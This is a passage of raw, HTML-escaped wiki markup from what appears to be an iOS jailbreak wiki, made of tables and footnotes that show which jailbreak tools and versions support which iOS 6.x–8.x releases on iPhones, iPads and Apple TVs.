| {{partial|Tethered&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered|class=rborderplz nobrradiusplz}}&amp;lt;ref group=&amp;quot;6.x_i&amp;quot; name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot; /&amp;gt;&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;6.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;upgradeable-evasi0n&amp;quot;&amp;gt;[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Upgradable to [[untethered jailbreak]] via evasi0n Cydia package.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipsw-upgradeable-evasi0n&amp;quot;&amp;gt;[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Requires pointing to 6.0 IPSW. Upgradable to [[untethered jailbreak]] via evasi0n Cydia package.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;upgradeable-p0sixspwn&amp;quot;&amp;gt;[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Upgradable to [[untethered jailbreak]] via p0sixspwn Cydia package.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipsw-upgradeable-p0sixspwn&amp;quot;&amp;gt;[[Tethered jailbreak]] on devices not vulnerable to [[0x24000 Segment Overflow]]. Requires pointing to 6.0 IPSW. Upgradable to [[untethered jailbreak]] via p0sixspwn Cydia package.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Apple TV=====&lt;br /&gt;
'''Note''': &amp;quot;Marketing Version&amp;quot; is the version that the Apple TV reports in its &amp;quot;About&amp;quot; screen.&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Marketing Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;3&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K66AP|Apple TV (2nd generation)]]&lt;br /&gt;
! [[J33AP|Apple TV (3rd generation) (AppleTV3,1)]]&lt;br /&gt;
! [[J33IAP|Apple TV (3rd generation) (AppleTV3,2)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 6.0&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| 1.0-1.5.3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| 0.9.15b1&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.?&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.1.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 6.0.1&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| 1.0-1.5.3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| 0.9.15b3&amp;lt;ref group=&amp;quot;6.x_atv&amp;quot; name=&amp;quot;ipsw&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.?&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 5.2&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 6.1&lt;br /&gt;
| [[evasi0n]]&lt;br /&gt;
| 1.0-1.5.3&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| 0.9.15b3&amp;lt;ref group=&amp;quot;6.x_atv&amp;quot; name=&amp;quot;ipsw&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.9.655 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.8.9.11241 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.2.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 6.1.3&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| 0.9.15b3&amp;lt;ref group=&amp;quot;6.x_atv&amp;quot; name=&amp;quot;ipsw&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| 1.0-1.0.8&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.?&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 5.3&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 6.1.4&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| 0.9.15b3&amp;lt;ref group=&amp;quot;6.x_atv&amp;quot; name=&amp;quot;ipsw&amp;quot; /&amp;gt;&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[p0sixspwn]]&lt;br /&gt;
| 1.0-1.0.8&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.5&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;6.x_atv&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ipsw&amp;quot;&amp;gt;Point at 6.0 IPSW.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====7.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;12&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[iPad (3rd generation)]]&lt;br /&gt;
! [[iPad (4th generation)]]&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad mini]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPhone 4]]&lt;br /&gt;
! [[N94AP|iPhone 4S]]&lt;br /&gt;
! [[iPhone 5]]&lt;br /&gt;
! [[iPhone 5c]]&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[iPod touch (5th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| 7.0&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.7&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;hexedit&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.1&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.7&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.2&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.7&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.3&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.7&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.4&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0-1.0.7&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.5&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.5-1.0.7&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.6&lt;br /&gt;
| [[evasi0n7]]&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;offline&amp;quot; /&amp;gt;&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.6-1.0.7&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 7.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Geeksn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.5-2.8.3&amp;lt;ref group=&amp;quot;7.x_i&amp;quot; name=&amp;quot;upgradeable-semi&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9-2.9.1&lt;br /&gt;
| {{partial|Semi-Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 7.1.1&lt;br /&gt;
| [[Geeksn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9-2.9.1&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Semi-Tethered}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 7.1.2&lt;br /&gt;
| [[Geeksn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.9-2.9.1&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Semi-Tethered}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Pangu]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{yes}}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;7.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;offline&amp;quot;&amp;gt;Due to the jailbreak payload being removed from the evasi0n website, a modified version of evasi0n7 is now required for a successful jailbreak.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;hexedit&amp;quot;&amp;gt;Build 11A466. Requires a hex edit of [[evasi0n7]] binary. See [https://i.imgur.com/GVQnpig.png this image]&amp;lt;!-- http://web.archive.org/web/20150112161857/https://i.imgur.com/GVQnpig.png --&amp;gt;.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;upgradeable-semi&amp;quot;&amp;gt;[[Tethered jailbreak]]. &amp;quot;Upgradable&amp;quot; to semi-tethered with &amp;quot;GeekSn0w Semi Untether Payload&amp;quot; (&amp;lt;code&amp;gt;com.blackgeek.geeksn0wsemiuntetherpayload&amp;lt;/code&amp;gt;) from [http://geekrepo.beiphone.it geekrepo.beiphone.it].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Apple TV=====&lt;br /&gt;
'''Note''': &amp;quot;Marketing Version&amp;quot; is the version that the Apple TV reports in its &amp;quot;About&amp;quot; screen.&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Marketing Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K66AP|Apple TV (2nd generation)]]&lt;br /&gt;
! [[Apple TV (3rd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 6.0&lt;br /&gt;
| 7.0.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.0.1&lt;br /&gt;
| 7.0.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 6.0.2&lt;br /&gt;
| 7.0.4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 7.0.6&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1&lt;br /&gt;
| 7.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.1.1&lt;br /&gt;
| 7.1.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 7.1.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | No Tool Available&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 6.2.1&lt;br /&gt;
| Seas0nPass&lt;br /&gt;
| 0.9.7 beta&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
====8.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;16&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[iPad (3rd generation)]]&lt;br /&gt;
! [[iPad (4th generation)]]&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad mini]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPad mini 3]]&lt;br /&gt;
! [[N94AP|iPhone 4S]]&lt;br /&gt;
! [[iPhone 5]]&lt;br /&gt;
! [[iPhone 5c]]&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[N61AP|iPhone 6]]&lt;br /&gt;
! [[N56AP|iPhone 6 Plus]]&lt;br /&gt;
! [[iPod touch (5th generation)]]&lt;br /&gt;
! [[N102AP|iPod touch (6th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 8.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu8]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ssh&amp;quot; /&amp;gt; (Windows)&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{partial}}&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ipad-wifi&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 8.0.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu8]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ssh&amp;quot; /&amp;gt; (Windows)&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{partial}}&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ipad-wifi&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 8.0.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu8]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ssh&amp;quot; /&amp;gt; (Windows)&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{partial}}&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ipad-wifi&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 8.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Pangu8]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1&amp;lt;ref group=&amp;quot;8.x_i&amp;quot; name=&amp;quot;ssh&amp;quot; /&amp;gt; (Windows)&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 8.1.1&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 8.1.2&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.2.0-1.2.1 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.1.3&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.0.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2.0-2.4.5 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.2&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.0.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2.0-2.4.5 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.3&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.0.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2.0-2.4.5 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.4&lt;br /&gt;
| [[PPJailbreak]]&lt;br /&gt;
| 2.0.0 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;16&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[TaiG]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2.0-2.4.5 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0.0-1.1.0 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 8.4.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[EtasonJB]]&lt;br /&gt;
| RC2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
